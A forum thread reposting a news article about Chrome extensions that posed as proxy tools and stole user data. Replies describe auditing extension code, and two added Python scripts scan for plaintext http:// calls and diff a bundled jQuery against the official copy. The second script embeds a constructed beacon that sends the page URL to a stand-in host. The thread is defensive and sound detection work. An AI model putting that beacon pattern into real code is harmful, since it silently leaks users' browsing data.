Malicious Chrome Extensions Caught Stealing Sensitive Data


Posted (edited)

Just for reading ... not much of a Chrome person.

https://www.foxnews.com/tech/malicious-chrome-extensions-caught-stealing-sensitive-data

Malicious Chrome extensions caught stealing sensitive data

Kurt Knutsson, CyberGuy Report / January 5, 2026

Chrome extensions are supposed to make your browser more useful, but they've quietly become one of the easiest ways for attackers to spy on what you do online. Security researchers recently uncovered two Chrome extensions that have been doing exactly that for years.

These extensions looked like harmless proxy tools, but behind the scenes, they were hijacking traffic and stealing sensitive data from users who trusted them. What makes this case worse is where these extensions were found. Both were listed on Chrome's official extension marketplace.

... just adding, the comments at the bottom of the article page are many and interesting. They number around 393 at this time. They take a little time to load, that's why I did not see them when I first posted the article.

...

Edited by Monroe: add at end

Posted

Interesting!  These are actually quite easy to prevent!

I never (and I do mean *NEVER*) install extensions via Chrome Web Store.

It's sad that we have to jump through these hoops, but in the case of the discussed "Phantom Shuttle" extension (no longer available on CWS but still available at crx4chrome), it really is VERY EASY to prevent these types of telemetry.  Whether you want to see if your extension is contacting AD SERVERS or whether you want to see if any TELEMETRY is being collected, it really is VERY EASY.

This isn't some old-dog new-trick complexity either.

Just drag-and-drop *ALL* .js files contained within the extension to Notepad++ then search-all for http:// (important to note that there is NO "S", search for http, not https).

In the case of "Phantom Shuttle" (v3.1.9 was the one I tested, most recent on crx4chrome), there are TWENTY TWO of them.  Some legit, others not.

This isn't 1990!  Generally speaking, NOTHING should ever be communicated on http versus https!

The extension is doing this http traffic so that your browser doesn't throw a "certificate error".

Extensions should *NEVER* need to communicate via http.

Doesn't mean that the mere presence of http over https is a legit concern, but does show you what to watch for in your network traffic logs.

Or, at minimum, a gauge for those that do not monitor such logs.

It's not a tell-tale, but you learn over time just what to look for.

I always (*always*) modify my extensions (i.e., prevent phone-home auto-update checks, prevent visits to home page at install/uninstall, etc.).

Sad, but we do live in an age where you have to take some steps to safeguard yourself, the "nanny state" doesn't have your best interests in mind, they have their own agenda.
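The search-for-http:// check described in the post above, automated as an added example (this is not code from the post, the article, or the extension): a Python script that walks an unpacked extension, lists every plaintext http:// literal per .js file, and sets aside the W3C/XML namespace URIs that libraries such as jQuery carry but never actually request. The sample extension files, paths and hosts it builds are constructed for the demo and are hypothetical.

```python
"""Scan an unpacked Chrome extension for plaintext http:// URL literals.

Added example, not code from the post or from any real extension. It
automates the Notepad++ "search all files for http://" step: every
http:// literal in every .js file is reported, and well-known XML
namespace identifiers (present in jQuery and similar libraries, never
fetched over the network) are listed separately so they do not drown
out real candidates. The sample extension below is constructed.
"""
import os
import re
import tempfile

# "http://" followed by anything up to a quote, whitespace or delimiter.
# "https://" never matches: after "http" comes "s", not ":".
HTTP_URL = re.compile(r"\bhttp://[^\s'\"`)<>;]+")

# Identifiers that look like URLs but are only used as namespace names.
KNOWN_NAMESPACE_PREFIXES = (
    "http://www.w3.org/",
    "http://schemas.xmlsoap.org/",
)


def find_http_urls(text):
    """Return (candidates, namespaces) for all http:// literals in JS source."""
    candidates, namespaces = [], []
    for url in HTTP_URL.findall(text):
        url = url.rstrip(".,")  # trailing punctuation is not part of the URL
        if url.startswith(KNOWN_NAMESPACE_PREFIXES):
            namespaces.append(url)
        else:
            candidates.append(url)
    return candidates, namespaces


def scan_extension(root):
    """Walk an unpacked extension dir; map each .js file to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                cands, ns = find_http_urls(fh.read())
            if cands or ns:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                report[rel] = {"candidates": cands, "namespaces": ns}
    return report


# Constructed sample extension: hypothetical files and hosts, not real ones.
SAMPLE_FILES = {
    "background.js": (
        "const api = 'https://api.example.com/v1';\n"           # TLS: ignored
        "fetch('http://stats.example.net/ping?id=' + uid);\n"   # plaintext: reported
    ),
    "lib/vendor.min.js": (
        "e.createElementNS('http://www.w3.org/2000/svg','svg');\n"  # namespace only
    ),
    "popup.js": "document.title = 'Proxy settings';\n",          # nothing to report
}


def build_sample_extension():
    """Write SAMPLE_FILES into a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="ext_")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, hits in scan_extension(build_sample_extension()).items():
        print(path)
        for url in hits["candidates"]:
            print("  PLAINTEXT ", url)
        for url in hits["namespaces"]:
            print("  namespace ", url)
```

Unpack the .crx first (unzip usually extracts it despite warning about the leading header bytes, or load it unpacked via chrome://extensions) and pass that directory to scan_extension. A hit is a lead, not a verdict: confirm in the browser's network log which of the listed hosts are actually contacted, and whether anything from the page or the profile goes along with the request.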

Posted

I couldn't find anything "suspicious" in the extension's embedded "jQuery v1.12.2" (jquery-1.12.2.min.js) [cited in the article as the root cause].

The CDN that publishes these jQuery files is public - ie, here -- https://blog.jquery.com/2016/03/17/jquery-1-12-2-and-2-2-2-released/

The "v1.12.2" in the extension and the "v1.12.2" from the official blog are DRASTICALLY DIFFERENT.

To be fair, this is my first comparison of an extension's jQuery to the blog's jQuery.

But if the two files identify as the SAME VERSION, I certainly wouldn't expect so many DIFFERENCES.

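The comparison in the post above, done mechanically, as an added example that is not the poster's code and not jQuery's: hash the bundled file and a reference copy, and when the hashes differ, diff them statement by statement so that whatever was inserted can be read instead of eyeballed in a minified one-liner. Both library bodies below are constructed stand-ins carrying the same version banner, with a hypothetical injected call; they are not real jQuery. In practice the reference is the official release file (the one linked from the jQuery blog post above) saved locally before running.

```python
"""Compare a library bundled in an extension against a known-good reference.

Added example, not from the post. A file that announces the same version
as the official release but differs from it is the signal the post
describes. This makes the check mechanical: SHA-256 of both copies, the
version banner of both, and, on mismatch, a statement-level diff (minified
JS is usually one physical line, so a line diff says nothing). Both
sources below are constructed stand-ins, not real jQuery.
"""
import difflib
import hashlib
import re


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def version_banner(source: str):
    """Version string from a '/*! jQuery vX.Y.Z ...' header, or None."""
    m = re.search(r"jQuery v(\d+\.\d+\.\d+)", source)
    return m.group(1) if m else None


def split_statements(source: str):
    """Split minified JS at ';' so the diff works on statements.

    Heuristic: a ';' inside a string literal also splits, which is
    acceptable here because both sides are split the same way.
    """
    return [s.strip() for s in source.split(";") if s.strip()]


def compare_library(vendored: str, reference: str) -> dict:
    """Hash both copies; if they differ, list statements added/removed."""
    result = {
        "vendored_sha256": sha256_hex(vendored.encode("utf-8")),
        "reference_sha256": sha256_hex(reference.encode("utf-8")),
        "same_version_banner": version_banner(vendored) == version_banner(reference),
        "added": [],
        "removed": [],
    }
    result["identical"] = result["vendored_sha256"] == result["reference_sha256"]
    if result["identical"]:
        return result
    ref, ven = split_statements(reference), split_statements(vendored)
    matcher = difflib.SequenceMatcher(a=ref, b=ven, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag in ("replace", "delete"):
            result["removed"].extend(ref[i1:i2])
        if tag in ("replace", "insert"):
            result["added"].extend(ven[j1:j2])
    return result


# Constructed stand-ins (hypothetical code, hypothetical host; not jQuery).
BANNER = "/*! jQuery v1.12.2 | (c) jQuery Foundation | jquery.org/license */\n"
REFERENCE = (
    BANNER
    + '!function(a,b){"use strict";var c=a.document;'
    + 'b.ajax=function(u){var x=new a.XMLHttpRequest;x.open("GET",u);x.send()};'
    + "a.jQuery=b}(window,{});"
)
VENDORED = (
    BANNER
    + '!function(a,b){"use strict";var c=a.document;'
    + 'b.ajax=function(u){var x=new a.XMLHttpRequest;x.open("GET",u);x.send()};'
    # Injected beacon: a plaintext http:// request carrying the page URL.
    + 'b._t=function(){(new a.Image).src="http://example.net/t?u="+c.location.href};'
    + "setInterval(b._t,6e4);"
    + "a.jQuery=b}(window,{});"
)


if __name__ == "__main__":
    r = compare_library(VENDORED, REFERENCE)
    print("same version banner:", r["same_version_banner"])
    print("identical:", r["identical"])
    for s in r["added"]:
        print("+", s)
    for s in r["removed"]:
        print("-", s)
```

Since both strings announce v1.12.2, the banner alone says nothing; the hash mismatch plus the two inserted statements is what you would look for. Run it against the real jquery-1.12.2.min.js from the extension and the one downloaded from the official release, and every "+" line is code the library's authors did not ship.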
